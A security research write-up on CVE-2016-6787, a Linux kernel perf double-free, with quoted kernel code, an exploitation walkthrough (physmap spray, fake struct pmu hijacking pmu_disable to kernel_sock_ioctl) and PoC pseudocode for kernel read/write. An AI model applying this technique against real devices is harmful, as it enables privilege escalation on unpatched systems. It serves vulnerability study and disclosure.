===
Abstract
perf is a complex subsystem of the Linux kernel,
and it has had other vulnerabilities, such as CVE-2013-2094
.
Di Shen, a member of Keen Team, presented a paper (Defeating Samsung KNOX with zero privilege
)[1] that mentioned CVE-2016-6787
[2].
Analysis of CVE-2016-6787
This is a double-free vulnerability.
The vulnerable object is struct perf_event_context
. First, review the code below: the main bug is in the if(move_group)
statement, so setting move_group to 1 is necessary.
We will discuss how to set the variable move_group
in a later section.
Assuming that move_group
has been set to 1, look at the put_ctx(gctx)
call at line 20 of Code snippet 1
: no lock protects it when two threads run this path simultaneously.
put_ctx(gctx)
decrements gctx->refcount and then checks whether it has reached zero. If gctx->refcount
is zero, gctx is freed.
// Code snippet 1
if (move_group) {
struct perf_event_context *gctx = group_leader->ctx;
mutex_lock(&gctx->mutex);
perf_remove_from_context(group_leader, false);
/*
* Removing from the context ends up with disabled
* event. What we want here is event in the initial
* startup state, ready to be add into new context.
*/
perf_event__state_init(group_leader);
list_for_each_entry(sibling, &group_leader->sibling_list,
group_entry) {
perf_remove_from_context(sibling, false);
perf_event__state_init(sibling);
put_ctx(gctx);
}
mutex_unlock(&gctx->mutex);
put_ctx(gctx);
}
WARN_ON_ONCE(ctx->parent_ctx);
mutex_lock(&ctx->mutex);
if (move_group) {
synchronize_rcu();
perf_install_in_context(ctx, group_leader, group_leader->cpu);
get_ctx(ctx);
list_for_each_entry(sibling, &group_leader->sibling_list,
group_entry) {
perf_install_in_context(ctx, sibling, sibling->cpu);
get_ctx(ctx);
}
}
//http://elixir.free-electrons.com/linux/v3.18.20/source/kernel/events/core.c#L7290
So we can create at least two threads that race on this code path.
How about move_group
As the comment in the code below (Code snippet 2
) from line 12 to line 16 explains, if group_leader
leads a pure software group and we try to add a hardware event, all events in the group are moved to the hardware context.
// Code snippet 2
SYSCALL_DEFINE5(perf_event_open,
struct perf_event_attr __user *, attr_uptr,
pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
{
...
if (group_leader &&
(is_software_event(event) != is_software_event(group_leader))) {
if (is_software_event(event)) {
pmu = group_leader->pmu;
} else if (is_software_event(group_leader) &&
(group_leader->group_flags & PERF_GROUP_SOFTWARE)) {
/*
* In case the group is a pure software group, and we
* try to add a hardware event, move the whole group to
* the hardware context.
*/
move_group = 1;
}
}
//http://elixir.free-electrons.com/linux/v3.18.20/source/kernel/events/core.c
So we know that if move_group
equals one, all events in the group are moved from the software context into the hardware context, as shown in Code snippet 1
.
+-----------------------+ +-----------------------+
| software-context | | hardware-context |
|-----------------------| if(move_group |-----------------------|
| +------------------+ | == 1) | |
| | struct perf_event| | | |
| |------------------| | +------------> | |
| | group_leader | | | |
| | | | | |
| +------------------+ | | |
| ... | | |
+-----------------------+ +-----------------------+
Exploitation
Trigger the vulnerability
-
Thread_1 for allocation: In this thread we create the group_leader through
perf_event_open()
with the PERF_TYPE_SOFTWARE
type and the PERF_FLAG_FD_OUTPUT
flag, and then go to sleep via futex()
. You will get a
group_fd
from the above perf_event_open()
system call. The variable (group_fd) will be used by Thread_2 and Thread_3.
struct perf_event_attr attr = { 0 }; attr.type = 1; //PERF_TYPE_SOFTWARE; attr.config = 3LL; //PERF_COUNT_HW_CACHE_MISSES; attr.size = 96;//sizeof attr; pid = syscall(178); group_fd = perf_event_open(&attr, pid, 0xffffffffLL, -1LL, 2LL);
gctx->refcount = 1,
find_get_context() -> alloc_perf_context() -> __perf_event_init_context(struct perf_event_context *ctx) -> atomic_set(&ctx->refcount, 1);
-
Thread_2 and Thread_3 for free:
By invoking
perf_event_open(&attr, 0, 0, group_fd, 0)
with PERF_TYPE_HARDWARE
in both thread_2 and thread_3, we set move_group to one in each of them and make the two threads race.
Open Pandora’s box
The kernel does not crash immediately after this bug is triggered.
Therefore, we can do physmap-based spraying over the freed struct perf_event_context
.[5]
After the above threads go to sleep via futex()
, the kernel scheduler will execute
perf_event_context_sched_in()
, which leads to a kernel crash.
// Code snippet 3
/*
 * Kernel excerpt quoted by the article (v3.18-era kernel/events/core.c).
 *
 * Looks up the per-CPU context for @ctx and returns early when @ctx is
 * already that CPU context's task_ctx. Otherwise, with the context lock
 * held and ctx->pmu disabled, it calls cpu_ctx_sched_out() with
 * EVENT_FLEXIBLE when @ctx has pinned groups, calls perf_event_sched_in()
 * for @ctx and @task, and finally re-enables the pmu and drops the lock.
 *
 * The two "//" notes inside the body are the article author's annotations,
 * not part of the kernel source.
 */
static void perf_event_context_sched_in(struct perf_event_context *ctx,
struct task_struct *task)
{
struct perf_cpu_context *cpuctx;
cpuctx = __get_cpu_context(ctx);
/* Nothing to do if this context is already the CPU's task context. */
if (cpuctx->task_ctx == ctx)
return;
perf_ctx_lock(cpuctx, ctx);
perf_pmu_disable(ctx->pmu);
// Article note: the call above is hijacked; it ends up in kernel_sock_ioctl(), which sets addr_limit = -1.
if (!list_empty(&ctx->pinned_groups))
cpu_ctx_sched_out(cpuctx, EVENT_FLEXIBLE);
perf_event_sched_in(cpuctx, ctx, task);
perf_pmu_enable(ctx->pmu);
// Article note: the call above is hijacked; it goes straight to a ret instruction.
perf_ctx_unlock(cpuctx, ctx);
}
Our goal is to get root, not just a crash, so we need to set up a fake struct pmu
referenced by the
re-filled struct perf_event_context
. The struct pmu
contains several function pointers that we can hijack.
Look at struct pmu
; do you feel excited?
struct pmu {
...
int * __percpu pmu_disable_count;
struct perf_cpu_context * __percpu pmu_cpu_context;
int task_ctx_nr;
int hrtimer_interval_ms;
/*
* Fully disable/enable this PMU, can be used to protect from the PMI
* as well as for lazy/batch writing of the MSRs.
*/
void (*pmu_enable) (struct pmu *pmu); /* optional */
void (*pmu_disable) (struct pmu *pmu); /* optional */
...
According to Code snippet 3
, we can fill in the address of kernel_sock_ioctl
in place of the original address of pmu_disable
, because kernel_sock_ioctl
can give us the ability to write to kernel space arbitrarily.
kernel_setsockopt()
is another function of this kind.
Suppose that we can execute kernel_sock_ioctl()
and control its first argument (struct socket *sock
); then we can skip the set_fs(oldfs)
call and jump to the kernel_sock_ioctl
epilogue by manipulating struct socket *sock
.
We also fill in some hard-coded addresses to avoid a crash and to guarantee that writing to kernel space succeeds.
You can find more details in the PoC code section below.
/*
 * Kernel excerpt quoted by the article.
 *
 * Saves the current address limit, switches to KERNEL_DS, invokes the
 * socket's ioctl operation with @cmd and @arg, restores the saved limit,
 * and returns whatever the ioctl operation returned.
 */
int kernel_sock_ioctl(struct socket *sock, int cmd, unsigned long arg)
{
/* Remember the caller's address limit so it can be restored below. */
mm_segment_t oldfs = get_fs();
int err;
set_fs(KERNEL_DS);
err = sock->ops->ioctl(sock, cmd, arg);
/* Restore the address limit saved on entry. */
set_fs(oldfs);
return err;
}
If you can write to kernel space arbitrarily and have an information leak, that is almost equivalent to having root privilege. There are many PoCs and exploits on the internet, so we will not discuss it further here.
PoC pseudocode
The PoC below only sets up addr_limit so that kernel memory can be written.
/*
 * Pseudocode: writes the fields of the fake `struct pmu` located at address
 * `pmu`. The loc_* values are addresses defined outside this excerpt, and
 * the numeric offsets are taken as given by the article.
 * Each "//" note describes the assignment directly above it.
 */
static void init_pmu(unsigned long pmu)
{
// Refer to `struct pmu` in include/linux/perf_event.h.
*(unsigned long*)(pmu + 64) =
loc_per_cpu_start;
// pmu->pmu_cpu_context; set to avoid a crash.
*(unsigned long*)(pmu + 96) =
loc_kernel_sock_ioctl;
// pmu->pmu_disable (function pointer), pointing to kernel_sock_ioctl.
*(unsigned long*)(pmu + 56) =
loc_per_cpu_start;
// pmu->pmu_disable_count, pointing to _per_cpu_start.
*(unsigned long*)(pmu + 88) =
loc_direct_ret;
// pmu->pmu_enable (function pointer).
*(unsigned long*)(pmu + 40) = pmu + 0x100;
// Plays the role of sock->ops, for hijacking sock->ops->ioctl.
*(unsigned long*)(pmu + 328) =
loc_kernel_sock_ioctl_ret;
// Plays the role of sock->ops->ioctl; set to kernel_sock_ioctl_ret.
}
/*
 * Pseudocode: walks from start_addr up to ret2dir_limit in steps of
 * alloc_size, mapping each region and writing pmu_addr into it at
 * 512-byte strides. All variables are defined outside this excerpt.
 */
void phymaps_spray()
{
/* Spray fake `struct perf_event_context` objects, each pointing to
* the fake pmu that we placed in user space.
*/
while ( start_addr < ret2dir_limit )
{
addr = mmap((void*)start_addr, alloc_size);
while ( addr < addr + alloc_size )
{
// Refer to `struct perf_event_context` in include/linux/perf_event.h.
*(unsigned long*)addr = pmu_addr;
addr += 512LL;
}
mlock(addr, alloc_size);
start_addr += alloc_size;
}
}
/*
 * Pseudocode: maps the memory for the fake pmu, initializes it with
 * init_pmu(), and then calls lift_spray() (not defined in this excerpt).
 */
void prepare()
{
pmu_addr = mmap(pmu_address) // map a memory range in user space.
init_pmu(pmu_addr); // initialize the fake pmu.
lift_spray();
}
/*
 * Pseudocode for the allocating thread: opens the software event, stores
 * the result in group_id, signals sem, and then sleeps in futex() until
 * it is woken up.
 */
void *thread_1_for_alloc()
{
group_id = perf_event_open(pid, PERF_TYPE_SOFTWARE);
sem_post(&sem);
futex(FUTEX_WAIT_REQUEUE_PI); // wait to be woken up.
if (read_at_address_pipe(Kernel_space))
puts("Turn UAF bug to arbitrary read/write memory");
/* Once execution reaches this point, arbitrary memory can be read and written.
* From there it is convenient to get root privileges, just like `towelroot`.
*/
}
/*
 * Pseudocode for each of the two freeing threads: opens a hardware event
 * in the group identified by group_id, signals sem, and then sleeps.
 */
void *thread_for_free()
{
perf_event_open(pid, PERF_TYPE_HARDWARE, group_id);
sem_post(&sem);
futex() // go to sleep.
}
/*
 * Pseudocode: starts one allocating thread and two freeing threads, waits
 * on sem once per thread, then calls stop_lift_spray() (not defined in
 * this excerpt) and phymaps_spray(), and finally wakes thread_1_for_alloc.
 */
int trigger()
{
thread_create(thread_1_for_alloc);
thread_create(thread_for_free);
thread_create(thread_for_free);
/* One sem_wait() for each of the three threads' sem_post(). */
sem_wait(&sem);
sem_wait(&sem);
sem_wait(&sem);
stop_lift_spray();
phymaps_spray();
futex(FUTEX_CMP_REQUEUE_PI); /* wake up thread_1_for_alloc */
}
/* Pseudocode entry point: runs prepare() and then trigger(). */
void main()
{
prepare();
trigger();
}
Reference
[1] Defeating Samsung KNOX with zero privilege https://www.blackhat.com/docs/us-17/thursday/us-17-Shen-Defeating-Samsung-KNOX-With-Zero-Privilege-wp.pdf
[2] perf: protect group_leader from races that cause ctx https://patchwork.kernel.org/patch/9499761/
[3] samsung s7 source code https://github.com/jcadduono/android_kernel_samsung_msm8996.git
[4] perf: protect group_leader from races that cause ctx double-free https://android.googlesource.com/kernel/msm/+/5b87e00be9ca28ea32cab49b92c0386e4a91f730%5E!/
[5] From Collision To Exploitation: Unleashing Use-After-Free Vulnerabilities in Linux Kernel http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20From%20collision%20to%20exploitation%3A%20Unleashing%20Use-After-Free%20vulnerabilities%20in%20Linux%20Kernel.pdf